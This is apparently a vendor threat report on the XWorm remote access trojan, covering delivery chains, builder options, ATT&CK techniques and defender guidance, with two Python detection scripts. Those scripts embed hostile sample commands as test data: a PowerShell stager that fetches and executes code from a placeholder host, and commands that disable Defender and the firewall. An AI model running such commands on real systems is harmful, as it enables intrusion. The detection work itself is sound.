XWorm RAT analysis: Steal, persist & control

    XWorm is a stealthy remote access tool that often arrives in an ordinary message and can end in full takeover. A single click can give an intruder eyes on a screen, a path to private accounts, and a way to move deeper into a network.

    • First seen at scale around 2022 as a commercial RAT and quickly adopted due to its modular design.

    • In the wild, 78% of XWorm campaigns delivered other malware alongside it, and over 60% of the add-ons were RATs.

    • 5,523 indicators of compromise are linked to XWorm, signaling sustained campaigns.

    • XWorm campaigns were only 58% English, with Spanish and German making up 32% combined, expanding reach beyond typical language patterns.

    Anish Bogati
    Security Research

    Akanksha Girii
    Associate Security Researcher


    Overview

    XWorm is a “commodity” Remote Access Trojan (RAT) sold and shared in the cyber-crime ecosystem. It is not just another remote-access utility: XWorm is built to shape-shift, one package that can spy, steal, move files, and even plug into larger attacks, whatever the operator needs at that moment.

    XWorm surfaced for sale in mid-2022 on dark-web marketplaces; since then it has grown into a common, MaaS-style RAT with frequent version bumps (v4.x → v5.x → v6.x). XWorm combines ease of use that appeals to inexperienced operators with the flexibility and reliability to craft tailored payloads, making it equally useful to more advanced groups. Cofense has linked XWorm activity to clusters like Nullbulge, UAC-0184, and TA558, showing how it appeals to opportunistic actors and more organized crews alike.

    The real nightmare for cybersecurity teams isn't XWorm's individual capabilities—it's the operational tempo. Recent incidents show just how quickly threat actors can pivot and scale their operations. A single builder campaign compromised 18,459 devices worldwide, demonstrating the malware's ability to achieve massive scale rapidly.

    Threat actors use different routes to deliver XWorm, showing how adaptable the campaigns are. In early 2025, state operators leaned on “ClickFix”, tricking victims into executing malicious commands by presenting them as solutions to technical issues. Kimsuky adopted a ClickFix-style lure that steers targets into launching PowerShell and running attacker code, then used encoded, multi-stage scripts and fileless techniques to fetch and execute XWorm.

    Attackers have also leveraged Cloudflare’s TryCloudflare Tunnels in phishing campaigns targeting thousands of organizations over five-month periods. Their emails and pages led to LNK or VBS files, fetched Python installers, and finally delivered the payload. TA558 used steganography and script-heavy chains, hiding VBS and PowerShell inside images and documents to unpack commodity malware that includes XWorm.

     

    Builder & Variants


    XWorm Builder is a simple GUI that lets you assemble an XWorm sample without coding. You pick options; it compiles a payload. Fast, repeatable, and the same flow across versions.

     

    What it lets you do

    With a handful of toggles, you can switch on XWorm's core features (keylogger, clipper, anti-analysis/anti-kill), choose how persistence works (Registry, Scheduled Tasks, Startup), and adjust simple behavior like sleep delay and drop location. Before exporting, you can wrap the build with an obfuscator, set assembly metadata, or apply a custom icon, so every build feels “bespoke” even if the recipe is the same.

    For the report we used the Builder to generate samples of v5.6, focusing on one capability at a time (e.g., clipper-only, schtasks-based persistence, anti-analysis on). For every feature, we produced a focused build, executed it, and analyzed the resulting artifacts and telemetry.

    We then repeated the same matrix on v6.0. Using equivalent configurations, we did not observe any noticeable feature changes between v5.6 and v6.0: the exposed capabilities, observable TTPs, and resulting telemetry were functionally consistent.

     

    Technical Overview

    Most XWorm stories begin in the inbox: a convincing email or lure page leads you to click an attachment or a link. What lands on disk (or in memory) is a tiny loader, and XWorm keeps changing its costume: LNK/HTA/VBS/WSF, JS, BAT, PowerShell, ZIP/ISO/IMG/VHD, .NET and native EXEs, even Office macros as observed by Splunk. Defenders cannot rely on one telltale file type.

    After the click, the chain branches. In many runs, a scripted stager (VBS/WSF/HTA/PS1) reaches out, pulls an encoded payload, and decodes/decrypts it in memory; it then runs evasion (e.g., an AMSI bypass by patching clr.dll), checks for virtual machines, debuggers, emulators and sandbox environments, and establishes persistence (Scheduled Task or Startup folder) before dropping or injecting the core client. In other runs, the loader runs directly (for example, a .NET executable or a DLL side-load) and skips PowerShell entirely. The point is not one perfect chain; it is flexibility, so the same lure theme can deliver through whatever path evades that environment's controls.

    The delivery trick also varies by campaign: Cofense tracked 22 different mechanisms, with batch scripts and LNK downloaders among the most common; plenty of emails used password-protected archives or “legit” files to slip past filters. Some of the more advanced lures push users to a web page that copies a PowerShell command to the clipboard (“ClickFix”) and nudges them to run it—no direct download needed.
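    The stager and ClickFix paths described above leave one reliable trace: the PowerShell command line. The following Python is an added example, not code from the report or from XWorm itself; it decodes an -EncodedCommand operand (Base64 of UTF-16LE script), then flags the launch switches and script behaviours this section describes (download cradle, in-memory execution, payload decoding, AMSI tampering, VM checks, Security Center discovery). The explorer.exe-parent heuristic for ClickFix and all sample command lines are constructed assumptions for illustration.

```python
"""Triage PowerShell command lines for the XWorm stager pattern (added example)."""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass

# powershell.exe accepts unambiguous switch prefixes, so -e/-ec/-en/-enc all mean
# -EncodedCommand; the operand is Base64 of the UTF-16LE script text.
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
SUSPICIOUS_SWITCHES = [
    ("execution-policy bypass", r"(?i)[-/](?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)"),
    ("hidden window", r"(?i)[-/](?:w|win|windowstyle)\s+hidden"),
    ("no profile", r"(?i)[-/]nop(?:rofile)?\b"),
    ("non-interactive", r"(?i)[-/]noni(?:nteractive)?\b"),
]
# Behaviours of the stager chain once the script text is visible (heuristic keywords).
BEHAVIOUR_PATTERNS = {
    "download cradle": re.compile(r"(?i)DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Net\.WebClient|Start-BitsTransfer"),
    "in-memory execution": re.compile(r"(?i)\bIEX\b|Invoke-Expression|Assembly\]::Load"),
    "payload decoding": re.compile(r"(?i)FromBase64String|-bxor|Cryptography\.Aes|CreateDecryptor"),
    "AMSI tampering": re.compile(r"(?i)amsi|clr\.dll"),
    "VM/sandbox check": re.compile(r"(?i)Win32_ComputerSystem|Win32_BIOS|VMware|VirtualBox|vbox|Hyper-V|QEMU"),
    "security software discovery": re.compile(r"(?i)SecurityCenter2|AntiVirusProduct"),
}


@dataclass
class Verdict:
    decoded: str | None       # script recovered from -EncodedCommand, if any
    switches: list[str]       # suspicious launch switches seen on the command line
    behaviours: list[str]     # behaviour labels matched in the visible script text
    clickfix_like: bool       # explorer.exe parent + download cradle (heuristic)
    score: int


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    match = ENCODED_SWITCH.search(cmdline)
    if not match:
        return None
    blob = match.group(1)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None  # operand was not a well-formed encoded command


def analyse(cmdline: str, parent_image: str = "") -> Verdict:
    decoded = decode_encoded_command(cmdline)
    # Drop the Base64 blob before keyword matching so random blob bytes cannot match.
    visible = ENCODED_SWITCH.sub(" ", cmdline) + ("\n" + decoded if decoded else "")
    switches = [name for name, pat in SUSPICIOUS_SWITCHES if re.search(pat, cmdline)]
    if decoded is not None:
        switches.append("encoded command")
    behaviours = [name for name, pat in BEHAVIOUR_PATTERNS.items() if pat.search(visible)]
    # ClickFix lures have the victim paste into the Run dialog or a terminal, so the
    # PowerShell process is a child of explorer.exe rather than of Office or a script host.
    clickfix_like = parent_image.lower().endswith("explorer.exe") and "download cradle" in behaviours
    score = len(switches) + 2 * len(behaviours) + (2 if clickfix_like else 0)
    return Verdict(decoded, switches, behaviours, clickfix_like, score)


def encode_for_powershell(script: str) -> str:
    """Produce an -EncodedCommand operand the way an attacker's lure page would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples (not real campaign data). example.invalid is a reserved TLD.
STAGER = ("$b=(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.txt');"
          "$d=[Convert]::FromBase64String($b);IEX([Text.Encoding]::UTF8.GetString($d))")
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", f"powershell.exe -nop -w hidden -ep bypass -enc {encode_for_powershell(STAGER)}"),
    (r"C:\Windows\System32\cmd.exe",
     r'powershell -ep bypass -c "Get-CimInstance -Namespace root\SecurityCenter2 -ClassName AntiVirusProduct"'),
    (r"C:\Windows\System32\svchost.exe", 'powershell.exe -NoProfile -Command "Get-Date"'),
]


def run_samples() -> list[Verdict]:
    return [analyse(cmd, parent) for parent, cmd in SAMPLE_EVENTS]


if __name__ == "__main__":
    for (parent, cmd), verdict in zip(SAMPLE_EVENTS, run_samples()):
        print(f"score={verdict.score:2d} clickfix={verdict.clickfix_like!s:5} "
              f"switches={verdict.switches} behaviours={verdict.behaviours}")
        if verdict.decoded:
            print("  decoded:", verdict.decoded)
```

    Run it over Sysmon Event ID 1 or Security 4688 command lines; the decoded script, not the Base64 blob, is what the SIEM rule should match on, which is why the block strips the operand before keyword matching.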

     

    MITRE ATT&CK Framework

    Capabilities observed with XWorm, grouped by tactic, with the ATT&CK technique ID for each technique.

    Initial Access

    • T1566 Phishing. XWorm commonly arrives through email phishing; attachments are often PDFs or archives that contain a shortcut or script, and opening it runs a small stager that downloads the RAT.

    Execution

    • T1204.002 User Execution: Malicious File. The user double-clicks a shortcut or staged script (.lnk, .bat, .hta) that pulls the next stages.

    • T1059.001 Command and Scripting Interpreter: PowerShell. Stagers download, decrypt, and run payloads with an execution-policy bypass.

    Persistence

    • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder. Drops a copy of the RAT into the user's Startup directory and places a shortcut so it launches at user logon.

    • T1053.005 Scheduled Task/Job: Scheduled Task. Creates a scheduled task to run the binary at logon or on a short recurring interval.

    Defense Evasion

    • T1562.001 Impair Defenses: Disable or Modify Tools. Tampers with the Defender service and weakens protection by changing Defender preferences so that real-time, script and behavior checks are turned down.

    • T1562.004 Impair Defenses: Disable or Modify System Firewall. Turns off Windows Firewall for all profiles.

    • T1027 Obfuscated Files or Information. Base64/AES-encrypted resources, string obfuscation, and in-memory AMSI patching.

    • T1497.001 Virtualization/Sandbox Evasion: System Checks. Checks for VM or sandbox artifacts and alters execution or exits when they are found.

    Credential Access

    • T1539 Steal Web Session Cookie. Collects session material such as Discord and Telegram tokens and browser cookies.

    • T1555.003 Credentials from Password Stores: Credentials from Web Browsers. Harvests saved credentials and autofill data from Chromium and Firefox profiles.

    Discovery

    • T1010 Application Window Discovery. Enumerates open windows and tracks the active window title to guide operator actions and monitoring.

    • T1082 System Information Discovery. Gathers host profile data including OS version, GPU name, driver version, adapter RAM, and video processor.

    • T1518.001 Software Discovery: Security Software Discovery. Queries the Windows Security Center WMI namespace (root\SecurityCenter2) for installed and registered antivirus products.

    Collection

    • T1056.001 Input Capture: Keylogging. Built-in keylogger capability.

    • T1113 Screen Capture. Periodic screenshots as part of RAT surveillance.

    • T1115 Clipboard Data. Clipboard monitoring and “clipper” behavior that replaces cryptocurrency addresses with the operator's.

    Command and Control

    • T1571 Non-Standard Port. C2 over non-standard TCP ports.

    • T1001.003 Data Obfuscation: Protocol or Service Impersonation. Impersonates legitimate protocols or web-service traffic.

    Lateral Movement

    • T1021.005 Remote Services: VNC (HVNC). Establishes covert VNC sessions that let the operator control the desktop without a visible UI.

    Impact

    • T1486 Data Encrypted for Impact. Ransomware-style file encryption module available to operators.

    • T1498.001 Network Denial of Service: Direct Network Flood. DDoS commands that make infected hosts flood remote targets or exhaust local services.

    • T1489 Service Stop. Stops Windows services to weaken defenses.

     

    Defender Guidance & Best Practices

    XWorm is a builder-driven, modular .NET RAT that favors speed over novelty: it is commonly delivered via WSF/VBS/HTA → PowerShell chains, phones home (often via Telegram), and persists with simple Run keys or scheduled tasks. Its plugin set (keylogging, screen capture, clipboard monitoring, browser/token theft, file operations, remote desktop) makes it useful to low-skill operators while still blending in with admin-looking activity. For defenders and administrators alike, the play is to block the easy paths, harden scripting, and raise visibility where XWorm tries to hide.

    • Keep systems and software up to date.

    • Block risky attachments (ISO/LNK/HTA, macro docs) at the email gateway; also block execution of these file types on endpoints via GPO.

    • Use protective DNS and web filtering; block newly registered/low-reputation domains and restrict downloads from file-sharing/paste sites.

    • Harden PowerShell: disable v2, enable Script Block & Module Logging, and require signed scripts for admins.

    • Restrict LOLBAS: allowlist mshta, wscript/cscript, regsvr32, rundll32 only where needed; alert if they make network connections.

    • Limit egress: use host firewalls to restrict outbound connections from script hosts and PowerShell.

    • Alert on persistence artifacts: new scheduled tasks and Run-key entries pointing to %AppData%, %ProgramData%, user profiles, or new startup items.

    • Centralize telemetry in your SIEM and retain at least six months of logs.

    • Enforce MFA for all accounts; at minimum cover admin, VPN, and cloud accounts.

    • Separate admin and daily accounts and enforce least privilege.

    • Allowlist applications and RMM tools; block and alert on unapproved installs.

    • Isolate high-value systems and restrict RDP/SMB/WMI/WinRM between network segments.
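    The persistence, defense-evasion and egress rows of the ATT&CK table above and the “alert on persistence artifacts” and “alert if they make network connections” bullets describe the same handful of detections. The Python below is an added example, not Logpoint's detection content or any XWorm code: it normalises Sysmon-style events (IDs 1, 3, 11, 13 and Security 4698) into small dictionaries and maps each match to the technique ID from the table. The event shape, the drop-path list and all sample events are constructed assumptions; the client file name is a placeholder.

```python
"""Map XWorm-style host telemetry to ATT&CK techniques (added detection example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Drop locations the Builder's "drop location" option typically lands in; a Run key,
# task action or startup item resolving here is the alert the guidance asks for.
USER_WRITABLE = re.compile(
    r"(?i)%(?:appdata|localappdata|programdata|temp|public|userprofile)%"
    r"|\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)\\"
    r"|\\users\\public\\|\\programdata\\|\\windows\\temp\\"
)
RUN_KEY = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run(?:once)?\\")
STARTUP_DIR = re.compile(r"(?i)\\start menu\\programs\\startup\\")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "regsvr32.exe", "rundll32.exe"}
# Defender preference tampering and firewall teardown as they appear on a command line.
DEFENDER_TAMPER = re.compile(
    r"(?i)set-mppreference\b.*-disable(?:realtimemonitoring|scriptscanning|behaviormonitoring"
    r"|ioavprotection|blockatfirstseen)|add-mppreference\b.*-exclusionpath")
FIREWALL_OFF = re.compile(
    r"(?i)netsh\s+advfirewall\s+set\s+\w*profiles?\s+state\s+off"
    r"|set-netfirewallprofile\b.*-enabled\s+false")


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK ID from the table above, or "hardening" for guidance-only rules
    title: str
    evidence: str


def evaluate(event: dict) -> list[Finding]:
    """Apply the rules to one normalised event; returns zero or more findings."""
    kind = event["kind"]
    found: list[Finding] = []
    if kind == "registry_set":                       # Sysmon Event ID 13
        if RUN_KEY.search(event["target"]) and USER_WRITABLE.search(event["details"]):
            found.append(Finding("T1547.001", "Run key points at a user-writable path", event["details"]))
    elif kind == "file_create":                      # Sysmon Event ID 11
        if STARTUP_DIR.search(event["path"]):
            found.append(Finding("T1547.001", "New item in Startup folder", event["path"]))
    elif kind == "task_created":                     # Security Event ID 4698
        if USER_WRITABLE.search(event["action"]):
            found.append(Finding("T1053.005", "Scheduled task runs from a user-writable path", event["action"]))
    elif kind == "process_create":                   # Sysmon Event ID 1 / Security 4688
        cmd = event["cmdline"]
        if DEFENDER_TAMPER.search(cmd):
            found.append(Finding("T1562.001", "Defender protections weakened", cmd))
        if FIREWALL_OFF.search(cmd):
            found.append(Finding("T1562.004", "Windows Firewall disabled", cmd))
    elif kind == "network_connect":                  # Sysmon Event ID 3
        image = event["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
        if image in SCRIPT_HOSTS:
            found.append(Finding("hardening", f"{image} made an outbound connection", event["dest"]))
    return found


def triage(events: list[dict]) -> list[Finding]:
    return [finding for event in events for finding in evaluate(event)]


# Constructed sample events (not real telemetry); "client.exe" is a placeholder name.
SAMPLE_EVENTS = [
    {"kind": "registry_set",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\client",
     "details": r"C:\Users\alice\AppData\Roaming\client.exe"},
    {"kind": "file_create",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\client.lnk"},
    {"kind": "task_created", "action": r"C:\Users\alice\AppData\Roaming\client.exe"},
    {"kind": "process_create",
     "cmdline": 'powershell.exe -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true"'},
    {"kind": "process_create", "cmdline": "netsh advfirewall set allprofiles state off"},
    {"kind": "network_connect", "image": r"C:\Windows\System32\wscript.exe", "dest": "203.0.113.7:7000"},
    # Benign noise: a vendor task under Program Files and its updater talking out.
    {"kind": "task_created", "action": r"C:\Program Files\Vendor\updater.exe"},
    {"kind": "network_connect", "image": r"C:\Program Files\Vendor\updater.exe", "dest": "198.51.100.2:443"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding.technique}] {finding.title}: {finding.evidence}")
```

    The two benign events produce nothing because the rules key on location and identity (a user-writable drop path, a script host as the connecting image) rather than on any XWorm-specific string, which is what keeps them useful across the file-type and loader changes the Technical Overview describes.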
